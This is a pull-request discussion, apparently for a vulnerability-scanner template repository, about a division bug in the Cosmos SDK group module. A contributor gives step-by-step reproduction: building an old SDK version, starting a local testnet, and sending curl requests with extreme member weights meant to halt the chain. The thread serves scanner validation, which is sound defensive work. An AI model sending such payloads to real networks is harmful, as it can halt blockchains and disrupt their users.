Added template for cosmos-sdk-division-bug

[pdteamx]

Added template for cosmos-sdk-division-bug

[princechaddha]

Hello, thank you so much for sharing this template with the community and contributing to this project.

Could you please share more details about the issue, and if possible, provide the steps to set up a vulnerable environment to help validate it?

[MuhammadWaseem29]

Hi,

Thank you for your response and interest in the Cosmos SDK Division Bug Exploit template. Below, I’ve provided additional details about the issue and steps to set up a vulnerable environment for validation.

Issue Details

The vulnerability stems from a division error in the Cosmos SDK’s group module, specifically in the handling of group member weights during policy evaluation. When extreme weight values (e.g., very large or very small decimals) are used, the SDK’s decimal arithmetic can encounter precision errors, such as "decimal quotient error" or "exponent out of range." This can lead to a chain halt, disrupting consensus and potentially causing significant downtime. The issue is critical as it affects the integrity of group-based governance mechanisms.

References:

• Cosmos SDK Security Advisory
• HackerOne Report

Setting Up a Vulnerable Environment

To validate the exploit, you can set up a local Cosmos SDK-based blockchain with a vulnerable version (e.g., Cosmos SDK v0.46.x or earlier, prior to the patch). Below are the steps:

1. Prerequisites:

   • Install Go (v1.18 or later).
   • Install Docker for running a local testnet (optional but recommended).
   • Clone the Cosmos SDK repository:

     git clone https://github.com/cosmos/cosmos-sdk.git
     cd cosmos-sdk
     git checkout v0.46.0

2. Build and Install:

   • Build the Cosmos SDK binary:

     make install

   • Ensure simd (the Cosmos SDK binary) is in your $GOPATH/bin.

3. Set Up a Local Testnet:

   • Initialize a single-node testnet:

     simd init testnet --chain-id test-1

   • Generate a genesis file and add initial accounts:

     simd add-genesis-account cosmos14xzyhnr8w098awcf8l6t57qw3qlhcwsntytvm0 1000000stake
     simd add-genesis-account cosmos18v59wacnwz89qphdez62m6nn7qse8mgfr7m0lk 1000000stake
     simd gentx cosmos14xzyhnr8w098awcf8l6t57qw3qlhcwsntytvm0 1000000stake --chain-id test-1
     simd collect-gentxs

   • Start the node:

     simd start

4. Reproduce the Vulnerability:

   • Use a tool like curl or a REST client to send the HTTP requests from the template:
     • Step 1: Add group members with extreme weights (very small: 1e-50000, very large: 1e50000):

       curl -X POST http://localhost:1317/group/members -H "Content-Type: application/json" -d '{
         "members": [
           {"address": "cosmos14xzyhnr8w098awcf8l6t57qw3qlhcwsntytvm0", "weight": "1e-50000"},
           {"address": "cosmos18v59wacnwz89qphdez62m6nn7qse8mgfr7m0lk", "weight": "1e50000"}
         ]
       }'

     • Step 2: Submit a group proposal that triggers policy evaluation:

       curl -X POST http://localhost:1317/group/proposals -H "Content-Type: application/json" -d '{
         "group_policy_address": "cosmos17pmq7hp4upvmmveqexzuhzu64v36re3w3447n7dt46uwp594wtpsqv4fn5",
         "messages": [
           {
             "@type": "/cosmos.bank.v1beta1.MsgSend",
             "from_address": "cosmos17pmq7hp4upvmmveqexzuhzu64v36re3w3447n7dt46uwp594wtpsqv4fn5",
             "to_address": "cosmos14xzyhnr8w098awcf8l6t57qw3qlhcwsntytvm0",
             "amount": [{"denom": "stake", "amount": "10"}]
           }
         ],
         "metadata": "",
         "title": "Crash Test",
         "summary": "Testing large and small weights for policy",
         "proposers": ["cosmos14xzyhnr8w098awcf8l6t57qw3qlhcwsntytvm0"]
       }'

   • Monitor the node logs for errors like decimal quotient error or exponent out of range, indicating the vulnerability was triggered. The node may halt or fail to process the proposal.

5. Expected Outcome:

   • The node should encounter a division error during the group policy evaluation, potentially causing a chain halt.
   • The HTTP response or node logs should contain error messages matching the template’s matchers (decimal quotient error or exponent out of range).

6. Cleanup:

   • Stop the node (Ctrl+C) and remove the testnet data:

     rm -rf ~/.simapp

Notes

• Ensure the Cosmos SDK version is unpatched (pre-v0.47.0 or the specific patched commit). Patched versions mitigate this issue by adding bounds checks on weights.
• If you encounter issues with the REST API, verify the node is running with the API enabled (--api.enable true in the simd start command).
• For a more realistic test, you can use a multi-node testnet setup with tools like ignite or starport, but a single-node setup should suffice for this validation.

Please let me know if you need further clarification or assistance in setting up the environment. I’d be happy to help troubleshoot or provide additional details!

Best regards,
Muhammad Waseem

[MuhammadWaseem29]

update